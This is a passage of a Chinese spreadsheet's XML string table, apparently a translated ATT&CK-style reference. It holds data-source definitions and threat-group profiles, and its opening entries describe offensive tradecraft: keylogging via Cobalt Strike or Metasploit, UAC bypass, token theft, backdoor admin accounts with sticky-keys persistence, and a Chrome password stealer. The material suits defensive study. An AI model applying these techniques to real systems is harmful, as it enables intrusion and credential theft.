    <t>添加计划任务（/s是要在其上执行此操作的远程系统的名称/ip；/tn是任务的名称；/sc是何时运行；/ru是用户到运行的；/rp是该用户的密码）
可能需要确保计划服务已启动并配置为在引导时运行，以便持久性保持不变。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Keylogging对于从受害者那里获取凭据和其他信息非常有用，但请确保您是在属于您想要监视的用户的进程中进行Keylogging的。系统进程内的键记录不会让您获得系统上其他用户的击键。对于Cobalt Strike，请确保为作为目标受害者运行的进程指定了正确的体系结构和PID。对于Metasploit，请确保已迁移到作为目标受害者运行的进程（explore.exe总是很好）。</t>
  </si>
  <si>
    <t>显示系统上当前正在运行的进程和服务的列表</t>
  </si>
  <si>
    <t>这项技术尝试将一系列漏洞利用提升到系统级流程（这些是实际的漏洞利用，而不是滥用信任，因此总是有可能出现蓝筛选）</t>
  </si>
  <si>
    <t>显示工作站上本地管理员帐户的列表</t>
  </si>
  <si>
    <t>显示域管理员帐户列表</t>
  </si>
  <si>
    <t>通过注册表和服务启用RDP</t>
  </si>
  <si>
    <t>用于查看网络共享资源信息、添加新网络资源以及从计算机中删除旧网络资源。对前两个命令中发现的计算机运行此命令，以查看这些计算机上可用的共享。</t>
  </si>
  <si>
    <t>https://github.com/hassaanaliw/chromepass_x000D_
这个程序试图收集Chrome存储的密码。</t>
  </si>
  <si>
    <t>获取正在运行的Windows OS版本</t>
  </si>
  <si>
    <t>打印所有环境变量</t>
  </si>
  <si>
    <t>获取计算机名、用户名、操作系统软件版本、域信息、DNS、登录域</t>
  </si>
  <si>
    <t>显示有关计算机及其操作系统的详细配置信息，包括操作系统配置、安全信息、产品ID和硬件属性，如RAM、磁盘空间和网卡</t>
  </si>
  <si>
    <t>用于添加、删除和管理计算机上的用户。对前两个命令中发现的用户运行此命令，以收集有关目标用户的更多信息。</t>
  </si>
  <si>
    <t>Dsquery是服务器上的一个Windows实用程序，它有助于在域的Active Directory中查询有关用户、组和权限的大量信息。在构造dsquery命令时，如果您的域是“subdomain.domain.tld”，那么您的查询将包括“dc=subdomain，dc=domain，dc=tld”</t>
  </si>
  <si>
    <t>如果您有一个中等完整性的流程，但您是管理员，UACBypass将为您提供一个高完整性的流程，而无需提示用户进行确认。</t>
  </si>
  <si>
    <t>这会从另一个进程窃取访问令牌，并使用它获得对其他服务或计算机的访问权限。在Cobalt Strike中，此令牌仅在访问远程系统时使用，但在MeterMeter中，此令牌用于所有操作，直到通过rev2self丢弃为止。你需要在一个高完整性的过程中才能工作。</t>
  </si>
  <si>
    <t>用于查看网络共享资源信息，共享新的网络资源，以及从工作站中删除旧的共享网络资源。不适用于远程查询</t>
  </si>
  <si>
    <t>显示网络上工作站和网络设备的列表。</t>
  </si>
  <si>
    <t>创建一个经常出现在windows系统上的后门用户帐户，并将该用户添加到本地管理员组和远程桌面用户组。这与粘滞键持久性相结合，提供了一种无伤大雅的系统级持久性机制。</t>
  </si>
  <si>
    <t>如果系统上已存在support_388945a0帐户，但已禁用，则可以启用该帐户，然后将其添加到必要的组中。</t>
  </si>
  <si>
    <t>显示网络中的域控制器列表</t>
  </si>
  <si>
    <t>平台</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>收集层</t>
  </si>
  <si>
    <t>活动目录</t>
  </si>
  <si>
    <t>应用程序日志</t>
  </si>
  <si>
    <t>云服务</t>
  </si>
  <si>
    <t>云存储</t>
  </si>
  <si>
    <t>簇</t>
  </si>
  <si>
    <t>命令</t>
  </si>
  <si>
    <t>容器</t>
  </si>
  <si>
    <t>域名</t>
  </si>
  <si>
    <t>驱动程序</t>
  </si>
  <si>
    <t>驱动</t>
  </si>
  <si>
    <t>文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>防火墙</t>
  </si>
  <si>
    <t>固件</t>
  </si>
  <si>
    <t>组</t>
  </si>
  <si>
    <t>图片</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>运行工作负载的虚拟服务器环境，由本地或第三方云提供商托管</t>
  </si>
  <si>
    <t>系统进程</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>互联网扫描</t>
  </si>
  <si>
    <t>内核</t>
  </si>
  <si>
    <t>登录会话</t>
  </si>
  <si>
    <t>恶意软件存储库</t>
  </si>
  <si>
    <t>模块</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命名管道</t>
  </si>
  <si>
    <t>网络共享</t>
  </si>
  <si>
    <t>网络流量</t>
  </si>
  <si>
    <t>一种恶意的在线个人资料，代表对手通常使用的用户，用于社交工程师或其他目标受害者</t>
  </si>
  <si>
    <t>用户画像</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>进程</t>
  </si>
  <si>
    <t>预定任务</t>
  </si>
  <si>
    <t>脚本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>来自主机遥测的信息，提供有关系统状态、错误或其他显著功能活动的见解</t>
  </si>
  <si>
    <t>传感器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快照</t>
  </si>
  <si>
    <t>用户账号</t>
  </si>
  <si>
    <t>磁盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络凭证</t>
  </si>
  <si>
    <t>注册表</t>
  </si>
  <si>
    <t>证书</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一个数据库和一组服务，允许管理员管理权限、对网络资源的访问和存储的数据对象（用户、组、应用程序或设备）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>由第三方服务（如邮件服务器、web应用程序或其他设备）收集的事件（不是由本机操作系统或平台收集的）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一种数字文档，突出显示所有者身份等信息，用于向加密网络通信时使用的公钥灌输信任</t>
  </si>
  <si>
    <t>通过网络连接和/或API向用户提供的由本地或第三方提供商托管的基础设施、平台或软件</t>
  </si>
  <si>
    <t>数据对象存储基础设施由本地或第三方提供商托管，通过网络连接和/或API提供给用户</t>
  </si>
  <si>
    <t>一组容器化的计算资源，它们一起管理，但有单独的节点来执行各种任务和/或应用程序</t>
  </si>
  <si>
    <t>给计算机程序的一种指令，充当某种解释器，以执行特定任务</t>
  </si>
  <si>
    <t>虚拟化软件的标准单元，用于打包代码及其所有依赖项，以便应用程序从一个计算环境快速可靠地运行到另一个计算环境</t>
  </si>
  <si>
    <t>获得的关于一个或多个用人类可读名称注册的IP地址的信息（通常通过注册或活动日志）（例如：mitre.org）</t>
  </si>
  <si>
    <t>一种非易失性数据存储设备（硬盘驱动器、软盘、USB闪存驱动器），至少有一个格式化分区，通常安装到文件系统和/或分配一个驱动器号</t>
  </si>
  <si>
    <t>一种计算机程序，用于操作或控制连接到计算机上的特定类型的设备。为硬件设备提供软件接口，使操作系统和其他计算机程序能够访问硬件功能，而无需了解所用硬件的精确细节</t>
  </si>
  <si>
    <t>由I/O系统管理的计算机资源对象，用于存储数据（如图像、文本、视频、计算机程序或任何种类的其他媒体）</t>
  </si>
  <si>
    <t>一种网络安全系统，在端点上本地运行或作为服务远程运行（例如：云环境），根据预定义的规则监视和控制传入/传出的网络流量</t>
  </si>
  <si>
    <t>为主机的硬件和设备提供低级控制的计算机软件，如BIOS或UEFI/EFI</t>
  </si>
  <si>
    <t>多个用户帐户的集合，这些帐户共享对计算机和/或网络资源的相同访问权限，并具有共同的安全权限</t>
  </si>
  <si>
    <t>用于将虚拟机/可引导磁盘部署到本地或第三方云环境的单个文件</t>
  </si>
  <si>
    <t>有关连接到公共互联网的各种资源和服务器的信息（通常通过主动网络流量探测或网络爬网获得）</t>
  </si>
  <si>
    <t>一种计算机程序，位于计算机操作系统的核心，驻留在内存中，促进硬件和软件组件之间的交互</t>
  </si>
  <si>
    <t>登录发生在系统或资源（本地、域或云）上，用户/设备在成功身份验证和授权后正在访问该系统或资源</t>
  </si>
  <si>
    <t>获取（通过共享或提交的样本）有关对手使用的恶意软件（滴管、后门等）的信息</t>
  </si>
  <si>
    <t>由一个或多个共享类和接口组成的可执行文件，例如可移植可执行（PE）格式二进制文件/动态链接库（DLL）、可执行和可链接格式（ELF）二进制文件/共享库，以及Mach-O格式二进制文件/共享库</t>
  </si>
  <si>
    <t>允许本地或通过网络进行进程间通信的机制。命名管道通常以文件的形式存在，并且进程附加到它</t>
  </si>
  <si>
    <t>使用网络协议（如服务器消息块（SMB）或网络文件系统（NFS））从一台主机向其他主机提供的存储资源（通常是文件夹或驱动器）</t>
  </si>
  <si>
    <t>通过网络传输的数据（例如：Web、DNS、邮件、文件等），这些数据要么汇总（例如：Netflow），要么以可分析的格式（例如：PCAP）捕获为原始数据</t>
  </si>
  <si>
    <t>群集中单个共享资源单元，由一个或多个容器组成</t>
  </si>
  <si>
    <t>由至少一个线程执行的计算机程序的实例。进程具有用于进程可执行文件、加载模块（DLL或共享库）的内存空间，以及包含从用户输入到特定于应用程序的数据结构的所有内容的分配内存区域</t>
  </si>
  <si>
    <t>可以在特定时间或在后台运行的定期计划中执行的自动化任务（例如：Cron守护进程、任务调度器、BITS）</t>
  </si>
  <si>
    <t>包含命令列表的文件或流，允许按顺序启动命令</t>
  </si>
  <si>
    <t>配置为在后台连续执行并执行系统任务的计算机进程，在某些情况下，在任何用户登录之前</t>
  </si>
  <si>
    <t>可以在云环境中创建和/或部署的云卷（文件、设置等）的时间点拷贝</t>
  </si>
  <si>
    <t>代表用户、设备、服务或应用程序的配置文件，用于验证和访问资源</t>
  </si>
  <si>
    <t>本地托管或由第三方提供商托管的块对象存储，通常作为虚拟硬盘驱动器提供给资源</t>
  </si>
  <si>
    <t>用于向web应用程序和服务进行身份验证的凭据材料，如会话cookie或令牌</t>
  </si>
  <si>
    <t>一种Windows操作系统分层数据库，用于存储软件程序、硬件设备、用户首选项和操作系统配置的大部分信息和设置</t>
  </si>
  <si>
    <t>用于管理数据和操作的基础架构，支持对Windows个人计算机和服务器进行本地和远程管理</t>
  </si>
  <si>
    <t>数据源组成</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Active Directory凭据请求</t>
  </si>
  <si>
    <t>Active Directory对象访问</t>
  </si>
  <si>
    <t>Active Directory对象创建</t>
  </si>
  <si>
    <t>Active Directory对象删除</t>
  </si>
  <si>
    <t>Active Directory对象修改</t>
  </si>
  <si>
    <t>应用程序日志内容</t>
  </si>
  <si>
    <t>证书注册</t>
  </si>
  <si>
    <t>云服务禁用</t>
  </si>
  <si>
    <t>云服务枚举</t>
  </si>
  <si>
    <t>云服务元数据</t>
  </si>
  <si>
    <t>云服务修改</t>
  </si>
  <si>
    <t>云存储访问</t>
  </si>
  <si>
    <t>云存储创建</t>
  </si>
  <si>
    <t>云存储删除</t>
  </si>
  <si>
    <t>云存储枚举</t>
  </si>
  <si>
    <t>云存储元数据</t>
  </si>
  <si>
    <t>云存储修改</t>
  </si>
  <si>
    <t>集群元数据</t>
  </si>
  <si>
    <t>命令执行</t>
  </si>
  <si>
    <t>容器创建</t>
  </si>
  <si>
    <t>容器枚举</t>
  </si>
  <si>
    <t>容器元数据</t>
  </si>
  <si>
    <t>容器启动</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主动DNS</t>
  </si>
  <si>
    <t>域名注册</t>
  </si>
  <si>
    <t>被动DNS</t>
  </si>
  <si>
    <t>驱动器访问</t>
  </si>
  <si>
    <t>驱动创建</t>
  </si>
  <si>
    <t>驱动改造</t>
  </si>
  <si>
    <t>驾驶员负载</t>
  </si>
  <si>
    <t>驱动程序元数据</t>
  </si>
  <si>
    <t>文件访问</t>
  </si>
  <si>
    <t>文件创建</t>
  </si>
  <si>
    <t>文件删除</t>
  </si>
  <si>
    <t>文件元数据</t>
  </si>
  <si>
    <t>文件修改</t>
  </si>
  <si>
    <t>防火墙禁用</t>
  </si>
  <si>
    <t>防火墙枚举</t>
  </si>
  <si>
    <t>防火墙元数据</t>
  </si>
  <si>
    <t>防火墙规则修改</t>
  </si>
  <si>
    <t>固件修改</t>
  </si>
  <si>
    <t>组枚举</t>
  </si>
  <si>
    <t>组元数据</t>
  </si>
  <si>
    <t>组修改</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>图片创建</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>图片删除</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>图片元数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>图片修改</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>进程创建</t>
  </si>
  <si>
    <t>进程启动·</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>进程终止</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>响应元数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>响应内容</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内核模块加载</t>
  </si>
  <si>
    <t>登录会话创建</t>
  </si>
  <si>
    <t>登录会话元数据</t>
  </si>
  <si>
    <t>恶意软件内容</t>
  </si>
  <si>
    <t>恶意软件元数据</t>
  </si>
  <si>
    <t>模块加载</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命名管道元数据</t>
  </si>
  <si>
    <t>网络共享访问</t>
  </si>
  <si>
    <t>网络连接创建</t>
  </si>
  <si>
    <t>网络流量内容</t>
  </si>
  <si>
    <t>社会化媒体</t>
  </si>
  <si>
    <t>Pod创建</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pod枚举</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pod元数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pod修改</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统API执行</t>
  </si>
  <si>
    <t>进程访问</t>
  </si>
  <si>
    <t>Process枚举</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Process元数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Process结束</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统进程创建</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统进程删除</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统进程枚举</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统进程元数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统进程修改</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>预定工作创建</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>预定工作元数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>预定工作修改</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>脚本执行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主机状态</t>
  </si>
  <si>
    <t>服务创建</t>
  </si>
  <si>
    <t>服务元数据</t>
  </si>
  <si>
    <t>服务修改</t>
  </si>
  <si>
    <t>快照创建</t>
  </si>
  <si>
    <t>快照删除</t>
  </si>
  <si>
    <t>快照枚举</t>
  </si>
  <si>
    <t>快照元数据</t>
  </si>
  <si>
    <t>快照修改</t>
  </si>
  <si>
    <t>用户帐户身份验证</t>
  </si>
  <si>
    <t>创建用户帐户</t>
  </si>
  <si>
    <t>用户帐户删除</t>
  </si>
  <si>
    <t>用户帐户元数据</t>
  </si>
  <si>
    <t>用户帐户修改</t>
  </si>
  <si>
    <t>卷创建</t>
  </si>
  <si>
    <t>卷删除</t>
  </si>
  <si>
    <t>卷列举</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>卷元数据</t>
  </si>
  <si>
    <t>卷修改</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Web凭据创建</t>
  </si>
  <si>
    <t>Web凭据使用</t>
  </si>
  <si>
    <t>Windows注册表项访问</t>
  </si>
  <si>
    <t>Windows注册表项创建</t>
  </si>
  <si>
    <t>Windows注册表项删除</t>
  </si>
  <si>
    <t>Windows注册表项</t>
  </si>
  <si>
    <t>WMI创建</t>
  </si>
  <si>
    <t>用户请求的active directory凭据，例如票证或令牌（例如：Windows EID 4769）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开active directory对象，通常用于收集/读取其值（例如：Windows EID 4661）</t>
  </si>
  <si>
    <t>新active directory对象的初始构造（例如：Windows EID 5137）</t>
  </si>
  <si>
    <t>删除active directory对象（例如：Windows EID 5141）</t>
  </si>
  <si>
    <t>对active directory对象所做的更改（例如：Windows EID 5163或5136）</t>
  </si>
  <si>
    <t>第三方服务提供的日志、消息和其他工件（例如：来自邮件/web应用程序的度量、错误和/或警报）</t>
  </si>
  <si>
    <t>突出显示当前和过期数字证书的查询或记录信息（例如：证书透明度）</t>
  </si>
  <si>
    <t>云服务的停用或停止（例如：AWS Cloudtrail StopLogging）</t>
  </si>
  <si>
    <t>云服务的提取列表（例如：AWS ECS ListServices）</t>
  </si>
  <si>
    <t>有关云服务及其相关活动的上下文数据，例如名称、类型或目的/功能</t>
  </si>
  <si>
    <t>对云服务所做的更改，包括其设置和/或数据（例如：AWS CloudTrail DeleteTrail或DeleteConfigRule）</t>
  </si>
  <si>
    <t>打开云存储基础设施，通常用于收集/读取其价值（例如：AWS S3 GetObject）</t>
  </si>
  <si>
    <t>新云存储基础设施的初步建设（例如：AWS S3 CreateBucket）</t>
  </si>
  <si>
    <t>移除云存储基础设施（例如：AWS S3 DeleteBucket）</t>
  </si>
  <si>
    <t>云存储基础设施的提取列表（例如：AWS S3 ListBucket或ListObjects）</t>
  </si>
  <si>
    <t>有关云存储基础设施及其相关活动的上下文数据，如名称、大小或所有者</t>
  </si>
  <si>
    <t>对云存储基础架构所做的更改，包括其设置和/或数据（例如：AWS S3 PutObject或PutObjectAcl）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>关于集群及其周围活动的上下文数据，例如名称、命名空间、年龄或状态</t>
  </si>
  <si>
    <t>调用计算机程序指令以执行特定任务（例如：显示命令行参数、~/.bash_历史或~/.zsh_历史的cmd.exe的Windows EID 4688）</t>
  </si>
  <si>
    <t>新容器的初始构造（例如：docker create）</t>
  </si>
  <si>
    <t>提取的容器列表（例如：docker ps）</t>
  </si>
  <si>
    <t>有关容器及其周围活动的上下文数据，例如名称、ID、图像或状态</t>
  </si>
  <si>
    <t>容器的激活或调用（例如：docker start或docker restart）</t>
  </si>
  <si>
    <t>突出显示当前域到IP地址解析的查询域名系统（DNS）注册表数据（例如：dig/nslookup查询）</t>
  </si>
  <si>
    <t>有关域名分配和其他域元数据的信息（例如：WHOIS）</t>
  </si>
  <si>
    <t>记录的域名系统（DNS）数据，突出显示域到IP地址解析的时间线（例如：被动DNS）</t>
  </si>
  <si>
    <t>使用指定的驱动器号或装入点打开数据存储设备</t>
  </si>
  <si>
    <t>数据存储设备的驱动器号或装入点的初始构造</t>
  </si>
  <si>
    <t>对数据存储设备的驱动器号或装入点所做的更改</t>
  </si>
  <si>
    <t>将驱动程序附加到系统的用户或内核模式（例如：Sysmon EID 6）</t>
  </si>
  <si>
    <t>有关驱动程序及其周围活动的上下文数据，例如驱动程序问题报告或完整性（页面哈希、代码）检查</t>
  </si>
  <si>
    <t>打开文件，使文件内容可供请求者使用（例如：Windows EID 4663）</t>
  </si>
  <si>
    <t>新文件的初始构造（例如：Sysmon EID 11）</t>
  </si>
  <si>
    <t>删除文件（例如Sysmon Eid 23）</t>
  </si>
  <si>
    <t>有关文件的上下文数据，可能包括名称、内容（例如：签名、标题或数据/媒体）、用户/权限、权限等信息。</t>
  </si>
  <si>
    <t>对文件或其访问权限和属性所做的更改，通常是为了更改目标文件的内容（例如：Windows EID 4670或Sysmon EID 2）</t>
  </si>
  <si>
    <t>停用或停止云服务（例如：在Azure防火墙活动日志中写入/删除条目）</t>
  </si>
  <si>
    <t>可用防火墙和/或其关联设置/规则的提取列表（例如：Azure Network Firewall CLI Show命令）</t>
  </si>
  <si>
    <t>有关防火墙及其周围活动的上下文数据，如名称、策略或状态</t>
  </si>
  <si>
    <t>对防火墙规则所做的更改，通常是为了允许/阻止特定的网络流量（例如：Windows EID 4950或Azure防火墙规则收集活动日志中的写入/删除条目）</t>
  </si>
  <si>
    <t>对固件所做的更改，包括其设置和/或数据，如MBR（主引导记录）和VBR（卷引导记录）</t>
  </si>
  <si>
    <t>可用组和/或其关联设置的提取列表（例如：AWS列表组）</t>
  </si>
  <si>
    <t>描述组及其周围活动的组上下文数据，例如组内的名称、权限或用户帐户</t>
  </si>
  <si>
    <t>对组所做的更改，例如成员资格、名称或权限（例如：Windows EID 4728或4732、AWS IAM UpdateGroup）</t>
  </si>
  <si>
    <t>虚拟机映像的初始构造（例如：Azure计算服务映像）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>删除虚拟机映像（例如：Azure计算服务映像删除）</t>
  </si>
  <si>
    <t>有关虚拟机映像的上下文数据，例如名称、资源组、状态或类型</t>
  </si>
  <si>
    <t>对虚拟机映像所做的更改，包括设置和/或控制数据（例如：Azure计算服务映像修补程序）</t>
  </si>
  <si>
    <t>新实例的初始构造（例如：GCP审计日志中的instance.insert）</t>
  </si>
  <si>
    <t>删除实例（例如：GCP审核日志中的instance.delete）</t>
  </si>
  <si>
    <t>云环境中实例的提取列表（例如：GCP审核日志中的instance.list）</t>
  </si>
  <si>
    <t>有关实例及其周围活动的上下文数据，例如名称、类型或状态</t>
  </si>
  <si>
    <t>对实例所做的更改，包括其设置和/或控制数据（例如：GCP审核日志中的instance.AddResourcePolicys或instances.setMetadata）</t>
  </si>
  <si>
    <t>激活或调用实例（例如：GCP审核日志中的instance.start）</t>
  </si>
  <si>
    <t>实例的停用或停止（例如：GCP审核日志中的instance.stop）</t>
  </si>
  <si>
    <t>记录网络流量，以响应显示协议头和正文值的扫描</t>
  </si>
  <si>
    <t>通过扫描收集的有关面向Internet的资源的上下文数据，例如运行的服务或端口</t>
  </si>
  <si>
    <t>一种对象文件，包含扩展操作系统运行内核的代码，通常用于添加对新硬件（如设备驱动程序）和/或文件系统的支持，或用于添加系统调用</t>
  </si>
  <si>
    <t>新用户登录会话的初始构造（例如：Windows EID 4624、/var/log/utmp或/var/log/wmtp）</t>
  </si>
  <si>
    <t>有关登录会话的上下文数据，例如用户名、登录类型、访问令牌（安全上下文、用户SID、登录标识符和登录SID）以及其中关联的任何活动</t>
  </si>
  <si>
    <t>危害恶意负载的代码、字符串和其他签名</t>
  </si>
  <si>
    <t>有关恶意负载的上下文数据，例如编译时间、文件哈希以及水印或其他可识别的配置信息</t>
  </si>
  <si>
    <t>将模块附加到进程/程序的内存中，通常用于访问该模块提供的共享资源/功能（例如：Sysmon EID 7）</t>
  </si>
  <si>
    <t>关于系统上命名管道的上下文数据，包括管道名称和创建过程（例如：Sysmon EIDs 17-18）</t>
  </si>
  <si>
    <t>打开网络共享，使内容可供请求者使用（例如：Windows EID 5140或5145）</t>
  </si>
  <si>
    <t>网络连接的初始构造，例如使用源/目标IP和端口捕获套接字信息（例如：Windows EID 5156、Sysmon EID 3或Zeek conn.log）</t>
  </si>
  <si>
    <t>记录的网络流量数据显示协议头和正文值（例如：PCAP）</t>
  </si>
  <si>
    <t>汇总的网络数据包数据，以及协议头和卷等指标（例如：Netflow或Zeek http.log）</t>
  </si>
  <si>
    <t>建立、妥协或以其他方式获得的社交媒体角色</t>
  </si>
  <si>
    <t>新Pod的初步建造（例如：kubectl apply | run）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>集群中的pod的提取列表（例如：kubectl get pods）</t>
  </si>
  <si>
    <t>有关pod及其周围活动的上下文数据，如名称、ID、命名空间或状态</t>
  </si>
  <si>
    <t>对pod所做的更改，包括其设置和/或控制数据（例如：kubectl set | patch | edit）</t>
  </si>
  <si>
    <t>由进程执行的操作系统函数/方法调用</t>
  </si>
  <si>
    <t>由另一个进程打开一个进程，通常用于读取目标进程的内存（例如：Sysmon EID 10）</t>
  </si>
  <si>
    <t>新运行进程的诞生（例如：Sysmon EID 1或Windows EID 4688）</t>
  </si>
  <si>
    <t>关于正在运行的进程的上下文数据，可能包括环境变量、图像名称、用户/所有者等信息。</t>
  </si>
  <si>
    <t>对进程或其内容所做的更改，通常是为了在目标进程的内存中写入和/或执行代码（例如：Sysmon EID 8）</t>
  </si>
  <si>
    <t>退出正在运行的进程（例如：Sysmon EID 5或Windows EID 4689）</t>
  </si>
  <si>
    <t>新计划作业的初始构造（例如：Windows EID 4698或/var/log cron logs）</t>
  </si>
  <si>
    <t>有关计划作业的上下文数据，可能包括名称、时间、命令等信息。</t>
  </si>
  <si>
    <t>对计划作业所做的更改，例如对执行启动的修改（例如：Windows EID 4702或/var/log cron logs）</t>
  </si>
  <si>
    <t>通过脚本文件启动命令列表（例如：Windows EID 4104）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>日志、消息和其他突出显示主机传感器健康状况的工件（例如：日志应用程序的度量、错误和/或异常）</t>
  </si>
  <si>
    <t>新服务/守护程序的初始构造（例如：Windows EID 4697或/var/log守护程序日志）</t>
  </si>
  <si>
    <t>关于服务/守护进程的上下文数据，可能包括名称、服务可执行文件、启动类型等信息。</t>
  </si>
  <si>
    <t>对服务/守护程序所做的更改，例如对名称、描述和/或启动类型的更改（例如：Windows EID 7040或/var/log守护程序日志）</t>
  </si>
  <si>
    <t>新快照的初始构造（例如：AWS创建快照）</t>
  </si>
  <si>
    <t>删除快照（例如：AWS删除快照）</t>
  </si>
  <si>
    <t>云环境中快照库的提取列表（例如：AWS描述快照）</t>
  </si>
  <si>
    <t>有关快照的上下文数据，其中可能包括ID、类型和状态等信息</t>
  </si>
  <si>
    <t>对snapshop所做的更改，例如元数据和控制数据（例如：AWS修改快照属性）</t>
  </si>
  <si>
    <t>用户试图访问网络或计算资源，通常是通过提供凭据（例如：Windows EID 4625或/var/log/auth.log）</t>
  </si>
  <si>
    <t>新帐户的初始构造（例如：Windows EID 4720或/etc/passwd日志）</t>
  </si>
  <si>
    <t>删除帐户（例如：Windows EID 4726或/var/log访问/身份验证日志）</t>
  </si>
  <si>
    <t>有关帐户的上下文数据，可能包括用户名、用户ID、环境数据等。</t>
  </si>
  <si>
    <t>对帐户所做的更改，例如特定组中的权限和/或成员身份（例如：Windows EID 4738或/var/log access/authentication logs）</t>
  </si>
  <si>
    <t>云卷的初始构造（例如：AWS创建卷）</t>
  </si>
  <si>
    <t>删除云卷（例如：AWS删除卷）</t>
  </si>
  <si>
    <t>云环境中可用卷的提取列表（例如：AWS描述卷）</t>
  </si>
  <si>
    <t>有关云卷及其周围活动的上下文数据，例如id、类型、状态和大小</t>
  </si>
  <si>
    <t>对云卷所做的更改，包括其设置和控制数据（例如：AWS修改卷）</t>
  </si>
  <si>
    <t>新网络凭证材料的初步构建（例如：Windows EID 1200或4769）</t>
  </si>
  <si>
    <t>用户试图通过提供web凭据来访问网络或计算资源（例如：Windows EID 1202）</t>
  </si>
  <si>
    <t>打开注册表项，通常用于读取相关值（例如：Windows EID 4656）</t>
  </si>
  <si>
    <t>新注册表项的初始构造（例如：Windows EID 4656或Sysmon EID 12）</t>
  </si>
  <si>
    <t>删除注册表项（例如：Windows EID 4658或Sysmon EID 12）</t>
  </si>
  <si>
    <t>对注册表项和/或键值所做的更改（例如：Windows EID 4657或Sysmon EID 13 | 14）</t>
  </si>
  <si>
    <t>WMI对象的初始构造，例如筛选器、使用者、订阅、绑定或提供程序（例如：Sysmon EIDs 19-21）</t>
  </si>
  <si>
    <t>关联组</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>链接</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>admin@338是一个总部位于中国的网络威胁组织。此前，它曾利用有新闻价值的事件作为诱饵来传播恶意软件，主要针对参与金融、经济和贸易政策的组织，通常使用Toxinoivy等公开的老鼠，以及一些非公开的后门。</t>
  </si>
  <si>
    <t>Ajax安全团队是一个至少自2010年以来一直活跃的组织，据信在伊朗境外开展活动。到2014年，Ajax安全团队从网站污损行动转变为针对美国国防工业基地和伊朗反审查技术用户的基于恶意软件的网络间谍活动。</t>
  </si>
  <si>
    <t>Andariel 是一个由朝鲜国家赞助的威胁组织，至少从2009年起就一直活跃。安达瑞尔的行动主要针对韩国政府机构、军事组织和各种国内公司，包括破坏性袭击；他们还对自动取款机、银行和加密货币交易所进行了网络金融操作。安达瑞尔的著名活动包括“黑色地雷行动”、“金色行动”和“战役步枪”。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APT-C-36是一个可疑的南美间谍组织，至少自2018年以来一直活跃。该集团主要针对哥伦比亚政府机构以及金融部门、石油行业和专业制造业的重要企业。</t>
  </si>
  <si>
    <t>APT1是中国的一个威胁组织，隶属于中国人民解放军总参谋部第二局第三部门，其军事单位掩护标志（MUCD）通常称为61398部队。</t>
  </si>
  <si>
